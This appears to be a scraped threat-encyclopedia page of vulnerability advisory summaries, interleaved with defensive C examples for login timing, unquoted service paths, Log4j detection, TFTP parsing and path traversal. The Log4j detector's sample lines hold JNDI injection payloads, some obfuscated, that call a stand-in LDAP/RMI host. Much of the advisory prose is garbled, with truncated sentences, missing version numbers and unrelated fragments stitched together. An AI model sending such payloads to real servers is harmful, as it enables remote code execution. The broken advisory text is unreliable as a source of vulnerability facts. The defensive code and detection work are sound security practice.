Threat Encyclopedia | FortiGuard
Stack-based buffer overflow in Corel PDF Fusion allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a. Related IPS signatures: EXPLOIT-KIT Styx exploit kit fonts download page; FILE-OTHER Corel PDF Fusion XPS stack buffer overflow attempt.
This reflected cross-site scripting attack can be used to non-permanently deface or modify displayed content of portal Website. The Simple Diagnostics Agent – versions 1. Due to lack of authentication checks, an attacker could access administrative or other privileged functionalities and read, modify, or delete sensitive information and configurations.
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. The specific flaw exists within the handling of XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object.
The specific flaw exists within the parsing of JP2 images. Crafted data in a JP2 image can trigger a write past the end of an allocated buffer. The specific flaw exists within the handling of AcroForms. The specific flaw exists within the parsing of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. By performing actions in JavaScript, an attacker can trigger a read past the end of an allocated buffer.
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. The specific flaw exists within the OnMouseExit method. If an entity has an association readable by the user, then in some cases Mendix Runtime may not apply checks for XPath constraints that parse that association, within apps running on affected versions.
A malicious user could use this to dump and manipulate sensitive data. The tcserver. An authenticated attacker could escape the WinCC Kiosk Mode by opening the printer dialog in the affected application in case no printer is installed. Due to insecure deserialization of user-supplied content by the affected software, a privileged attacker could exploit this vulnerability by sending a maliciously crafted serialized Java object. This could allow the attacker to execute arbitrary code on the device with root privileges.
A privileged authenticated attacker could execute arbitrary commands in the local database by sending specially crafted requests to the webserver of the affected application. An attacker could then be able to sniff the network and capture sensitive information. The login functionality of the application does not employ any countermeasures against Password Spraying attacks or Credential Stuffing attacks. An attacker could obtain a list of valid usernames on the device by exploiting the issue and then perform a precise Password Spraying or Credential Stuffing attack in order to obtain access to at least one account.
The login functionality of the application fails to normalize the response times of login attempts performed with wrong usernames against those performed with correct usernames. A remote unauthenticated attacker could exploit this timing side channel to perform a username enumeration attack and identify valid usernames. The web application returns an AuthToken that does not expire at the defined auto-logoff delay timeout.
An attacker could capture this token and re-use old session credentials or session IDs for authorization. An attacker with the user profile access privilege can retrieve the stored password hashes of other accounts and then perform an offline cracking attack to recover the plaintext passwords of other users. The web application fails to enforce an upper bound on the cost factor of the PBKDF2 derived key during the creation or update of an account.
An attacker with the user profile access privilege could cause a denial of service (DoS) condition through CPU consumption by setting a PBKDF2 derived key with a remarkably high cost factor and then attempting a login to the modified account.
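The three login-side weaknesses above (timing difference between unknown and known usernames, unbounded KDF cost at account update, and the comparison itself) are easiest to see next to a login routine that avoids them. The following is an added example written for this page, not code from any of the products listed; it uses a stand-in KDF (iterated FNV-1a, labeled as such, not PBKDF2) so it runs without a crypto library, and the cost bounds DEFAULT_KDF_COST and MAX_KDF_COST are assumed policy values.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Policy bounds for the KDF work factor (assumed values; the advisory only
 * says that no upper bound was enforced). */
#define DEFAULT_KDF_COST 10000u
#define MAX_KDF_COST     100000u

struct account {
    const char *user;
    uint32_t    cost;      /* KDF work factor stored with the account */
    uint64_t    verifier;  /* toy_kdf(password, cost) */
};

/* Stand-in for PBKDF2: iterated FNV-1a. Not a real KDF and not secure; it is
 * here only so the example runs without a crypto library. Its running time
 * grows linearly with `cost`, which is the property the DoS depends on. */
static uint64_t toy_kdf(const char *pw, uint32_t cost) {
    uint64_t h = 0xcbf29ce484222325ULL;
    for (uint32_t round = 0; round < cost; round++) {
        for (const char *p = pw; *p; p++) {
            h ^= (unsigned char)*p;
            h *= 0x100000001b3ULL;
        }
        h ^= round;
        h *= 0x100000001b3ULL;
    }
    return h;
}

/* Constant-time equality: runtime does not depend on where the inputs differ. */
int ct_equal(const void *a, const void *b, size_t n) {
    const unsigned char *x = a, *y = b;
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++) diff |= (unsigned char)(x[i] ^ y[i]);
    return diff == 0;
}

/* Account create/update: refuse work factors outside policy instead of
 * storing whatever the caller asked for. Returns 0 on success, -1 if refused. */
int set_account_password(struct account *acct, const char *pw, uint32_t cost) {
    if (cost == 0 || cost > MAX_KDF_COST) return -1;
    acct->cost = cost;
    acct->verifier = toy_kdf(pw, cost);
    return 0;
}

/* Login that performs the same KDF work and the same comparison whether or
 * not the username exists, so response time does not reveal valid usernames.
 * Returns 1 on success, 0 on failure. */
int login(const struct account *db, size_t n, const char *user, const char *pw) {
    /* Decoy record used for unknown users; its cost mirrors a normal account. */
    static const struct account decoy = { "", DEFAULT_KDF_COST, 0 };
    const struct account *target = &decoy;
    int found = 0;
    for (size_t i = 0; i < n; i++)
        if (strcmp(db[i].user, user) == 0) { target = &db[i]; found = 1; }
    uint64_t got = toy_kdf(pw, target->cost);
    int match = ct_equal(&got, &target->verifier, sizeof got);
    return found & match;   /* bitwise: no early return on `found` */
}

/* Constructed sample: one account, then the four cases a reviewer would try.
 * Returns 1 when every case behaves as intended. */
int demo(void) {
    struct account db[1] = { { "alice", 0, 0 } };
    if (set_account_password(&db[0], "correct horse", DEFAULT_KDF_COST) != 0) return 0;
    return login(db, 1, "alice", "correct horse") == 1
        && login(db, 1, "alice", "wrong") == 0
        && login(db, 1, "nobody", "correct horse") == 0
        && set_account_password(&db[0], "x", 50u * 1000u * 1000u) == -1;
}
```

The decoy only equalizes timing when real accounts use the default cost; if accounts carry different costs, the server should derive against the decoy at the maximum cost it permits. With a real PBKDF2 the same structure applies: the KDF call always runs, the verifier compare is constant-time, and the work factor is validated before it is persisted.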
The affected system allows remote users to send maliciously crafted objects. Due to insecure deserialization of user-supplied content by the affected software, an unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted serialized object.
Affected applications improperly assign permissions to critical directories and files used by the application processes. If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4. A local unprivileged attacker may escalate to administrator privileges in Honeywell SoftMaster version 4.
The integrated web application “Online Help” in affected product contains a Cross-Site Scripting XSS vulnerability that could be exploited if unsuspecting users are tricked into accessing a malicious link.
Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user of the device into clicking a malicious link, thereby enabling phishing attacks. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.
However, the nature of the vulnerability is more general, and there may be other ways to exploit it. A memory corruption issue was addressed with improved state management.
This issue is fixed in watchOS 8. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. Simple Diagnostics Agent – versions 1. This allows information gathering which could be used to exploit future open-source security issues.
A feature was introduced in version 3. Knowing the proper format of the URL and the identifier of an existing object in an application it is possible to get access to that object without being logged in, even if the object is not shared, resulting in the opportunity for malicious exfiltration of user data. A specially-crafted PDF document can trigger an exception which is improperly handled, leaving the engine in an invalid state, which can lead to memory corruption and arbitrary code execution.
An attacker needs to trick the user to open the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.
Navigating to a specific URL with a patient ID number will result in the server generating a PDF of a lab report without authentication and rate limiting. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack.
The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:
– TLS clients consuming server certificates
– TLS servers consuming client certificates
– Hosting providers taking certificates or private keys from customers
– Certificate authorities parsing certification requests from subscribers
– Anything else which parses ASN.
In the OpenSSL 1. However any operation which requires the public key from the certificate will trigger the infinite loop.
In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1. It was addressed in the releases of 1. Fixed in OpenSSL 3. Fixed in OpenSSL 1. Affected application contains a stack based buffer overflow vulnerability while parsing specially crafted BDF files. The specific flaw exists within the parsing of PDF files.
Crafted data in a PDF file can trigger a read past the end of an allocated buffer. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. The component allows to activate a web server module which provides unauthenticated access to its web pages. This could allow an attacker to retrieve debug-level information from the component such as internal network topology or connected systems.
Affected application contains an out of bounds write past the end of an allocated structure while parsing specially crafted NEU files. A vulnerability has been identified in Simcenter Femap V Affected application contains a stack based buffer overflow vulnerability while parsing NEU files.
Affected application contains a memory corruption vulnerability while parsing NEU files. Affected application contains a type confusion vulnerability while parsing NEU files. In the IPv4 implementation in the Linux kernel before 5. In the IPv6 implementation in the Linux kernel before 5.
A service is started by an unquoted registry entry. As there are spaces in this path, attackers with write privilege to one of those directories might be able to plant executables that will run in place of the legitimate process. Attackers might achieve persistence on the system (backdoors) or cause a denial of service.
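To make the unquoted-path entry concrete: Windows CreateProcess resolves an unquoted command line by cutting it at each space and appending ".exe" where the fragment has no extension, so every such prefix is a file an attacker could plant. The code below is an added example for this page (not from the advisory or the affected product) that enumerates those candidates and the directory whose ACL must be checked for each; the sample ImagePath is constructed, and MAX_PATH_LEN mirrors the Windows MAX_PATH value.

```c
#include <stddef.h>
#include <string.h>

#define MAX_PATH_LEN 260   /* Windows MAX_PATH */

/* Returns 1 if an ImagePath value is safe from this class of hijack: either
 * the executable is wrapped in double quotes or the value contains no space. */
int image_path_is_safe(const char *image_path) {
    if (image_path[0] == '"') return 1;
    return strchr(image_path, ' ') == NULL;
}

/* For an unquoted ImagePath such as
 *     C:\Program Files\Vendor Tool\svc host.exe -arg
 * list, in the order Windows tries them, the executables CreateProcess will
 * look for before reaching the intended one: the value is cut at every space
 * and ".exe" is appended when the last component has no extension. Each
 * candidate whose parent directory is writable by a low-privileged user is a
 * planting point. Returns the number of candidates written to `out`. */
int unquoted_path_candidates(const char *image_path, char out[][MAX_PATH_LEN], int max) {
    size_t len = strlen(image_path);
    int n = 0;
    for (size_t i = 1; i <= len && n < max; i++) {
        if (image_path[i] != ' ' && image_path[i] != '\0') continue;
        if (i + 5 > MAX_PATH_LEN) break;           /* room for ".exe" and NUL */
        memcpy(out[n], image_path, i);
        out[n][i] = '\0';
        const char *sep = strrchr(out[n], '\\');
        const char *component = sep ? sep + 1 : out[n];
        if (strchr(component, '.') == NULL) strcat(out[n], ".exe");
        n++;
    }
    return n;
}

/* Parent directory of a candidate: the ACL to audit. Copies up to the last
 * backslash into `dir` (keeping the root backslash for "C:\"); returns 0 if
 * there is none or `dir` is too small. */
int candidate_directory(const char *candidate, char *dir, size_t dirsz) {
    const char *sep = strrchr(candidate, '\\');
    if (sep == NULL) return 0;
    size_t n = (size_t)(sep - candidate);
    if (n == 2 && candidate[1] == ':') n = 3;      /* drive root */
    if (n + 1 > dirsz) return 0;
    memcpy(dir, candidate, n);
    dir[n] = '\0';
    return 1;
}
```

For the sample path the candidates are C:\Program.exe, C:\Program Files\Vendor.exe, C:\Program Files\Vendor Tool\svc.exe and so on; the fix is simply to quote the executable in the ImagePath value, which image_path_is_safe accepts.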
Affected applications use a circumventable access control within a database service. This could allow an attacker to access the database. Apache Log4j2 versions 2. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted.
This issue was fixed in Log4j 2. Log4j 2. The web server of the affected system allows access to logfiles and diagnostic data generated by a privileged user. An unauthenticated attacker could access the files by knowing the corresponding download links. An undocumented debug port uses hard-coded default credentials. If this port is enabled by a privileged user, an attacker aware of the credentials could access an administrative debug shell on the affected device.
Acrobat Reader DC version Acrobat Reader DC displays a warning message when a user clicks on a PDF file, which could be used by an attacker to mislead the user.
In affected versions, this warning message does not include custom protocols when used by the sender. User interaction is required to abuse this vulnerability as they would need to click ‘allow’ on the warning message of a malicious file. A vulnerability has been identified in SiPass integrated V2. Affected applications insufficiently limit the access to the internal user authentication service.
This could allow an unauthenticated remote attacker to trigger several actions on behalf of valid user accounts. Affected applications insufficiently limit the access to the internal activity feed database. This could allow an unauthenticated remote attacker to read, modify or delete activity feed entries. Affected applications insufficiently limit the access to the internal message broker system. This could allow an unauthenticated remote attacker to subscribe to arbitrary message queues.
A cross-site scripting is present due to improper neutralization of data sent to the web page through the SVN WebClient in the affected product. An attacker could exploit this to execute arbitrary code and extract sensitive information by sending a specially crafted link to users with administrator privileges. JTTK library in affected products is vulnerable to an out of bounds read past the end of an allocated buffer when parsing JT files.
JTTK library in affected products contains an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. JTTK library in affected products contains a use-after-free vulnerability that could be triggered while parsing specially crafted JT files. JTTK library in affected products contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted JT files. JTTK library in affected products is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted JT files.
JTTK library in affected products is vulnerable to memory corruption condition while parsing specially crafted JT files.
JTTK library in affected products is vulnerable to an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. JTTK library in affected products is vulnerable to stack based buffer overflow while parsing specially crafted JT files. JTTK library in affected products contains a use after free vulnerability that could be triggered while parsing specially crafted JT files.
Apache Log4j2 2. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2. From version 2. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. The underlying MQTT service of affected systems does not perform authentication in the default configuration. This could allow an unauthenticated remote attacker to send arbitrary messages to the service and thereby issue arbitrary requests in the affected system.
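Because the lookup substitution described above happens before the JNDI lookup runs, attackers wrap the string in nested lookups (${lower:j}, ${::-j}, ${env:X:-j}) that plain grep for "${jndi:" misses. The detector below is an added example for this page, not Log4j code or anything from the advisory: it peels those layers the way the substitution engine would and then matches the resulting lookup. The log lines are constructed samples (203.0.113.0/24 is a documentation range).

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Case-insensitive "does s start with prefix". */
static int ci_prefix(const char *s, const char *prefix) {
    for (; *prefix; s++, prefix++)
        if (*s == '\0' || tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* True if the string contains a "${jndi:" lookup (case-insensitive). */
static int has_jndi_lookup(const char *s) {
    for (const char *p = strstr(s, "${"); p != NULL; p = strstr(p + 2, "${"))
        if (ci_prefix(p + 2, "jndi:")) return 1;
    return 0;
}

/* Resolve one innermost ${...} lookup in place, as the substitution engine
 * would before any JNDI lookup: ${lower:X} -> x, ${upper:X} -> X, and the
 * default-value forms ${anything:-X} and ${::-X} -> X. Lookups this code
 * cannot resolve (e.g. ${date:...}) are left alone. Every rewrite shrinks
 * the string, so it never grows. Returns 1 if something changed. */
static int peel_one_lookup(char *s) {
    char *open = NULL;
    for (char *p = s; *p; p++) {
        if (p[0] == '$' && p[1] == '{') { open = p; continue; }
        if (p[0] != '}' || open == NULL) continue;
        size_t blen = (size_t)(p - (open + 2));
        char body[256], repl[256];
        if (blen >= sizeof body) return 0;
        memcpy(body, open + 2, blen);
        body[blen] = '\0';
        if (ci_prefix(body, "lower:")) {
            strcpy(repl, body + 6);
            for (char *q = repl; *q; q++) *q = (char)tolower((unsigned char)*q);
        } else if (ci_prefix(body, "upper:")) {
            strcpy(repl, body + 6);
            for (char *q = repl; *q; q++) *q = (char)toupper((unsigned char)*q);
        } else {
            const char *dflt = strstr(body, ":-");
            if (dflt == NULL) { open = NULL; continue; }   /* not resolvable here */
            strcpy(repl, dflt + 2);
        }
        size_t rlen = strlen(repl);
        memmove(open + rlen, p + 1, strlen(p + 1) + 1);    /* slide the tail left */
        memcpy(open, repl, rlen);
        return 1;
    }
    return 0;
}

/* Returns 1 if the line carries a JNDI lookup, directly or behind nested
 * obfuscation layers; 0 otherwise. Only the first 1023 bytes are examined. */
int looks_like_jndi_lookup(const char *line) {
    char buf[1024];
    strncpy(buf, line, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (int layers = 0; layers < 64; layers++) {      /* bound the peeling loop */
        if (has_jndi_lookup(buf)) return 1;
        if (!peel_one_lookup(buf)) return 0;
    }
    return 0;
}

/* Constructed sample log lines (not real traffic). */
const char *sample_lines[] = {
    "203.0.113.7 - - \"GET / HTTP/1.1\" 200 \"${jndi:ldap://203.0.113.5/a}\"",
    "User-Agent: ${${lower:j}${upper:n}di:ldap://203.0.113.5/a}",
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/x}",
    "Referer: ${${env:NOPE:-j}ndi:dns://203.0.113.5/x}",
    "GET /index.html?ts=${date:yyyy} HTTP/1.1",
    "cart total is ${total} with ${sys:user.home:-/tmp}",
};
const int sample_count = 6;

/* Count how many of the sample lines are flagged (the first four should be). */
int count_flagged(void) {
    int n = 0;
    for (int i = 0; i < sample_count; i++) n += looks_like_jndi_lookup(sample_lines[i]);
    return n;
}
```

The detector is a triage aid, not a substitute for upgrading log4j-core: the peeling only covers the lookup forms listed in its comment, and an attacker can route the payload through headers or fields that never reach the log you are scanning.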
The affected systems do not properly validate input that is sent to the underlying message passing framework. This could allow a remote attacker to trigger a denial of service of the affected system. The affected firmware contains a buffer overflow vulnerability in the web application that could allow a remote attacker with engineer or admin privileges to potentially perform remote code execution.
The plmxmlAdapterSE The Image. The Jt The DLpdfl. This could allow an attacker to cause a denial-of-service condition.
In Mahara before Additional, in Mahara before An attacker could achieve privilege escalation on the web server of certain devices due to improper access control vulnerability in the engineering system software. The attacker needs to have direct access to the impacted web server. The affected software does not properly validate the server certificate when initiating a TLS connection. This could allow an attacker to spoof a trusted entity by interfering in the communication path between the client and the intended server.
Applications built with affected versions of Mendix Studio Pro do not properly control read access for certain client actions. This could allow authenticated attackers to retrieve the changedDate attribute of arbitrary objects, even when they don’t have read access to them. Applications built with affected versions of Mendix Studio Pro do not properly control write access for certain client actions.
This could allow authenticated attackers to manipulate the content of System.FileDocument objects in some cases, regardless of whether they have write access to them. This could result in an out of bounds write past the end of an allocated structure. The RSA white-box implementation in affected applications insufficiently protects the built-in private keys that are required to decrypt electronic intellectual property (IP) data in accordance with the IEEE recommended practice.
This could allow a sophisticated attacker to discover the keys, bypassing the protection intended by the IEEE recommended practice. When downloading files, the affected systems do not properly neutralize special elements within the pathname. An attacker could then cause the pathname to resolve to a location outside of the restricted directory on the server and read unexpected critical files.
The affected file download function is disabled by default. An unauthenticated remote attacker could exploit this issue to access sensitive information for subsequent attacks. The third-party component, in its TFTP functionality fails to check for null terminations in file names. If an attacker were to exploit this, it could result in data corruption, and possibly a hard-fault of the application.
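The TFTP entry above is the classic missing-terminator bug: the request format relies on NUL bytes the sender controls, and strlen/strcpy over a filename that has none walks off the end of the datagram. The parser below is an added example written for this page, not code from the affected third-party component; it bounds every string search by the received length, and the three datagrams are constructed samples.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_RRQ 1
#define TFTP_WRQ 2

struct tftp_request {
    uint16_t    opcode;
    const char *filename;     /* points into the packet, NUL-terminated */
    size_t      filename_len;
    const char *mode;         /* "octet", "netascii", ... */
};

/* Parse a TFTP RRQ/WRQ: opcode(2) | filename NUL | mode NUL.
 * Both strings are located with memchr bounded by the datagram length, so a
 * filename that runs to the end of the packet without a terminator is
 * rejected rather than read past the buffer. Returns 0 on success, -1 on a
 * malformed request. */
int tftp_parse_request(const uint8_t *pkt, size_t len, struct tftp_request *out) {
    if (len < 2) return -1;
    uint16_t op = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (op != TFTP_RRQ && op != TFTP_WRQ) return -1;
    const uint8_t *p = pkt + 2, *end = pkt + len;
    const uint8_t *nul = memchr(p, 0, (size_t)(end - p));
    if (nul == NULL || nul == p) return -1;              /* unterminated or empty filename */
    out->filename = (const char *)p;
    out->filename_len = (size_t)(nul - p);
    p = nul + 1;
    nul = memchr(p, 0, (size_t)(end - p));               /* end - p is 0 if nothing follows */
    if (nul == NULL || nul == p) return -1;              /* unterminated or empty mode */
    out->mode = (const char *)p;
    out->opcode = op;
    return 0;
}

/* The pattern the advisory describes, for contrast: strcpy trusts a
 * terminator the attacker can simply omit, so the copy reads past the
 * datagram into whatever memory follows. Never call this on untrusted input. */
void tftp_copy_filename_unsafe(const uint8_t *pkt, char *dst) {
    strcpy(dst, (const char *)pkt + 2);   /* bounded on neither side */
}

/* Constructed sample datagrams. */
const uint8_t tftp_sample_ok[]      = { 0, 1, 'f','w','.','b','i','n', 0, 'o','c','t','e','t', 0 };
const uint8_t tftp_sample_no_nul[]  = { 0, 1, 'f','w','.','b','i','n', 'o','c','t','e','t' };
const uint8_t tftp_sample_no_mode[] = { 0, 1, 'f','w','.','b','i','n', 0 };

/* Returns 1 when the good datagram parses and both truncated ones are rejected. */
int tftp_demo(void) {
    struct tftp_request r;
    return tftp_parse_request(tftp_sample_ok, sizeof tftp_sample_ok, &r) == 0
        && r.filename_len == 6 && strcmp(r.mode, "octet") == 0
        && tftp_parse_request(tftp_sample_no_nul, sizeof tftp_sample_no_nul, &r) == -1
        && tftp_parse_request(tftp_sample_no_mode, sizeof tftp_sample_no_mode, &r) == -1;
}
```

The filename pointer returned here is safe to pass to string functions only because the parser has proven a NUL exists inside the datagram; a server still has to apply a path-traversal check to it before opening anything.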
Within a third-party component, the process to allocate partition size fails to check memory boundaries. Therefore, if a large amount is requested by an attacker, an integer wraparound could result in a small size being allocated instead. Within a third-party component, whenever memory allocation is requested, the out-of-bound size is not checked.
Therefore, if size exceeding the expected allocation is assigned, it could allocate a smaller buffer instead. If an attacker were to exploit this, they could cause a heap overflow. If an attacker were to exploit this, they could act as a man-in-the-middle and eavesdrop on encrypted communications.
A timing attack, in a third-party component, could make the retrieval of the private key possible, used for encryption of sensitive data. If a threat actor were to exploit this, the data integrity and security could be compromised.
Applications built with affected versions of Mendix Studio Pro do not prevent file documents from being cached when files are opened or downloaded using a browser. This could allow a local attacker to read those documents by exploring the browser cache. An improper input validation vulnerability in the web server could allow an unauthenticated user to access device information. A vulnerability has been identified in Teamcenter Active Workspace V4. The application contains an unsafe unzipping pattern that could lead to a zip path traversal attack.
This could allow an attacker to execute a remote shell with admin rights. Affected devices write crashdumps without checking if enough space is available on the filesystem. Once the crashdump fills the entire root filesystem, affected devices fail to boot successfully. An attacker can leverage this vulnerability to cause a permanent Denial-of-Service.
The handling of log files in the web application of affected devices contains an information disclosure vulnerability which could allow logged in users to access sensitive files. The affected application contains a use-after-free vulnerability while parsing OBJ files. The affected application is vulnerable to information disclosure by unexpected access to an uninitialized pointer while parsing user-supplied OBJ files.
The affected application is vulnerable to an out of bounds read past the end of an allocated buffer when parsing JT files. An attacker could leverage this vulnerability to leak information in the context of the current process ZDI-CAN Adobe Acrobat Reader DC version An attacker could leverage this vulnerability to bypass mitigations such as ASLR.
A specially-crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. This could allow an attacker to create a Denial-of-Service condition. A restart is needed to restore normal operations. The web server of affected devices transmits data without TLS encryption. This could allow an unauthenticated remote attacker in a man-in-the-middle position to read sensitive data, such as administrator credentials, or modify data in transit.
The affected systems store sensitive information in log files. An attacker with access to the log files could publicly expose the information or reuse it to develop further attacks on the system. The affected component stores the credentials of a local system account in a potentially publicly accessible project file using an outdated cipher algorithm.
An attacker may use this to brute force the credentials and take over the system. The password hash of a local user account in the remote server could be granted via public API to a user on the affected system. An authenticated attacker could brute force the password hash and use it to login to the server.
Legitimate file operations on the web server of the affected systems do not properly neutralize special elements within the pathname. An attacker could then cause the pathname to resolve to a location outside of the restricted directory on the server and read, write or delete unexpected critical files. A path traversal vulnerability in the application could allow an attacker to bypass certain restrictions such as direct access to other services within the host. The affected application contains Insecure Direct Object Reference IDOR vulnerability that allows an attacker to use user-supplied input to access objects directly.
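The path-traversal entries on this page (the file download function that does not neutralize special elements in the pathname, the unsafe unzipping pattern in Teamcenter Active Workspace, and the read/write/delete traversal just above) all come down to one check: after decoding, does the user-supplied relative path still resolve inside the base directory? The routine below is an added example for this page, not code from any of the affected products; it normalizes lexically, rejects absolute paths, drive letters and backslashes, and refuses any ".." that climbs above the base. Sample names are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if `name` (a download parameter or archive entry name, already
 * URL-decoded) stays inside the base directory after lexical normalization,
 * writing the normalized relative path to `out`; 0 if it must be rejected. */
int safe_relative_path(const char *name, char *out, size_t outsz) {
    if (name[0] == '/' || name[0] == '\\') return 0;                    /* absolute */
    if (isalpha((unsigned char)name[0]) && name[1] == ':') return 0;    /* drive letter */
    if (strchr(name, '\\') != NULL) return 0;                           /* no backslash variants */
    size_t stack[64];            /* offset in `out` where each component begins */
    size_t depth = 0, olen = 0;
    const char *p = name;
    while (*p) {
        const char *q = strchr(p, '/');
        size_t clen = q ? (size_t)(q - p) : strlen(p);
        if (clen == 0 || (clen == 1 && p[0] == '.')) {
            /* "//" and "." contribute nothing */
        } else if (clen == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0) return 0;                                   /* climbs above base */
            depth--;
            olen = stack[depth];
        } else {
            if (depth >= 64 || olen + clen + 2 > outsz) return 0;
            stack[depth++] = olen;
            if (olen) out[olen++] = '/';
            memcpy(out + olen, p, clen);
            olen += clen;
        }
        p = q ? q + 1 : p + clen;
    }
    if (olen == 0) return 0;                                            /* names the base itself */
    out[olen] = '\0';
    return 1;
}

/* Join a validated name under `base`, e.g. for a download handler or for
 * each entry before extracting an archive. Returns 1 and fills `full` on
 * success, 0 if the name was rejected or the result does not fit. */
int join_under_base(const char *base, const char *name, char *full, size_t fullsz) {
    char rel[512];
    if (!safe_relative_path(name, rel, sizeof rel)) return 0;
    int n = snprintf(full, fullsz, "%s/%s", base, rel);
    return n > 0 && (size_t)n < fullsz;
}
```

Decode percent-encoding before calling this (otherwise "%2e%2e/" slips through as an ordinary name), and when the base directory contains symlinks, follow the lexical check with realpath() on the joined result and confirm the base prefix again.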
The “surrogate” functionality on the user profile of the application does not perform sufficient access control that could lead to an account takeover. An attacker can write to an arbitrary file, and display controlled contents, during signature verification. PDFTron prior to 9. This vulnerability can be exploited to execute arbitrary code.
An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Exploitation requires user interaction in that a victim must open a crafted PDF file in Acrobat Reader. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by a use-after-free vulnerability in the processing of a malformed PDF file that could result in disclosure of sensitive memory. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by a memory corruption vulnerability due to insecure handling of a malicious PDF file, potentially resulting in arbitrary code execution in the context of the current user.
User interaction is required to exploit this vulnerability. Adobe Framemaker versions Update 8 and earlier and Release Update 2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.
It allows memory corruption during conversion of a PDF document to a different document format. It allows stack consumption during recursive processing of embedded XML nodes. It allows writing to arbitrary files via submitForm. It allows an out-of-bounds read via util. Corel PDF Fusion 2. PDF Labs pdftk-java v3. Any authenticated user can create scheduled reports containing PDF screenshots of any view in the NagiosXI application. Due to lack of input sanitisation, the target page can be replaced with an SSRF payload to access internal resources or disclose local system files.
The SSH server on affected devices is configured to offer weak ciphers by default. This could allow an unauthorized attacker in a man-in-the-middle position to read and modify any data passed over the connection between legitimate clients and the affected device.
Improper neutralization of special characters on the web server configuration page could allow an attacker, in a privileged position, to retrieve sensitive information via cross-site scripting. The affected application assigns improper access rights to a specific folder containing configuration files.
Received web packets are not properly processed. An unauthenticated remote attacker with access to any of the Ethernet interfaces could send specially crafted packets to force a restart of the target device. A restart of the affected device is needed to restore normal operations.
The plmxmlAdapterIFC. This could allow an attacker to cause a denial-of-service condition or read sensitive information from memory locations. The IFC adapter in affected application contains a use-after-free vulnerability that could be triggered while parsing user-supplied IFC files. This could allow an attacker to manipulate the SINEC NMS configuration by tricking an unsuspecting user with administrative privileges to click on a malicious link.
An attacker with access to the webserver of an affected system could download arbitrary files from the underlying filesystem by sending a specially crafted HTTP request. An attacker could exploit this vulnerability to perform cross-site request forgery attacks. This could allow an attacker to execute arbitrary SQL statements. This could allow an attacker to inject malicious code that is executed when loading the attachment. This could allow an attacker to store malicious files.
An unauthenticated attacker in the same network of the affected system could manipulate certain parameters and set a valid user of the affected software as invalid or vice versa. The affected software has an information disclosure vulnerability that could allow an attacker to retrieve a list of network devices a known user can manage. An unauthenticated attacker in the same network of the affected system could brute force the usernames from the affected software. The affected software has an information disclosure vulnerability that could allow an attacker to retrieve the VPN connection of a known user.
A vulnerability has been identified in LOGO! An adjacent attacker with network access to the LAN interface could interfere with traffic, spoof the connection and gain access to sensitive information. An unauthenticated attacker could change the password of any user in the system under certain circumstances. With this an attacker could impersonate any valid user on an affected system.
The affected software allows sending send-to-sleep notifications to the managed devices. An unauthenticated attacker in the same network of the affected system can abuse these notifications to cause a Denial-of-Service condition in the managed devices. An unauthenticated remote attacker could exploit this vulnerability to cause interruptions in the network by sending specially crafted OSPF packets.
Successful exploitation requires OSPF to be enabled on an affected device. The application deserializes untrusted data without sufficient validation, which could result in arbitrary deserialization. This could allow an unauthenticated attacker to execute code in the affected system. An XML external entity injection vulnerability in the underlying XML parser could cause the affected application to disclose arbitrary files to remote attackers by loading a specially crafted XML file.
The status provided by the syslog clients managed by the affected software can be manipulated by an unauthenticated attacker in the same network of the affected system. The femap. This could result in an out of bounds read past the end of an allocated buffer. The affected devices do not properly handle permissions to traverse the file system.
An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user.
